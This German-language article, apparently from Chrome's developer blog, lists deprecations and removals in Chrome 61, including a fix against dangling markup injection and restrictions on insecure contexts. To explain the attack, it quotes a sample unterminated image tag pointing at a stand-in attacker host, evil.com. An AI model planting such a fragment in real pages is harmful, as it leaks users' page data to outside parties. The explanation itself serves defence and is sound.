Bei fast jeder Chrome-Version gibt es eine große Anzahl von Updates und Verbesserungen am Produkt, an seiner Leistung und auch an den Funktionen der Webplattform. In diesem Artikel werden die Einstellung und Entfernung von Funktionen in Chrome 61 beschrieben, die seit dem 3. August in der Betaversion verfügbar ist. Diese Liste kann sich jederzeit ändern.
Sicherheit und Datenschutz
Ressourcen blockieren, deren URLs die Zeichen „\n“ und „<“ enthalten
Es gibt eine Art von Hacking, die als Dangling Markup Injection bezeichnet wird. Dabei wird eine abgeschnittene URL verwendet, um Daten an einen externen Endpunkt zu senden. Angenommen, eine Seite enthält <img src='https://evil.com/?. Da die URL kein schließendes Anführungszeichen enthält, lesen Browser bis zum nächsten Anführungszeichen und behandeln die eingeschlossenen Zeichen als einzelne URL.
In Chrome 61 wird diese Sicherheitslücke durch eine Einschränkung der in den href- und src-Attributen zulässigen Zeichensätze geschlossen. Chrome beendet insbesondere die Verarbeitung von URLs, wenn er Zeilenumbruchzeichen (\n) und „kleiner als“-Zeichen (<) erkennt.
Entwickler, die einen legitimen Anwendungsfall für Zeilenumbrüche und weniger als Zeichen in einer URL haben, sollten diese Zeichen stattdessen maskieren.
Entfernung geplant | Chromestatus-Tracker | Chromium-Fehler
Einstellung und Entfernung der Presentation API in unsicheren Kontexten
Es wurde festgestellt, dass die Presentation API bei unsicheren Ursprüngen als Hacking-Vektor verwendet werden kann. Da Displays keine Adressleisten haben, kann die API verwendet werden, um Inhalte zu fälschen. Es ist auch möglich, Daten aus einer laufenden Präsentation zu exfiltrieren.
Gemäß der Absicht von Blink, leistungsstarke Funktionen für nicht sichere Ursprünge zu entfernen, planen wir, die Unterstützung der Presentation API für nicht sichere Kontexte einzustellen und zu entfernen. Ab Chrome 61 funktioniert PresentationRequest.start() nicht mehr bei unsicheren Ursprüngen.
Entfernung geplant | Chromestatus-Tracker | Chromium-Fehler
JavaScript
Definieren von indexierten Properties für Fenster nicht zulassen
Bisher waren in einigen Browsern JavaScript-Zuweisungen wie die folgenden zulässig:
window[0] = 1;
In der aktuellen HTML-Spezifikation wird darauf hingewiesen, dass dies einen expliziten Verstoß gegen die JavaScript-Spezifikation darstellt. Daher wird diese Funktion in Chrome 61 entfernt. Seit Februar 2016 entspricht Firefox bereits den Anforderungen.
Verwendung von Benachrichtigungen in unsicheren Iframes entfernen
Berechtigungsanfragen von Iframes können Nutzer verwirren, da es schwierig ist, zwischen der Herkunft der enthaltenen Seite und der Herkunft des Iframes zu unterscheiden, über den die Anfrage erfolgt. Wenn der Umfang der Anfrage unklar ist, können Nutzer nur schwer beurteilen, ob sie die Berechtigung erteilen oder verweigern sollen.
Durch das Verbot von Benachrichtigungen in Iframes werden auch die Anforderungen an die Berechtigung für Benachrichtigungen an die Anforderungen für Push-Benachrichtigungen angepasst, was die Nutzung für Entwickler erleichtert.
Entwickler, die diese Funktion benötigen, können ein neues Fenster öffnen, um die Berechtigung für Benachrichtigungen anzufordern.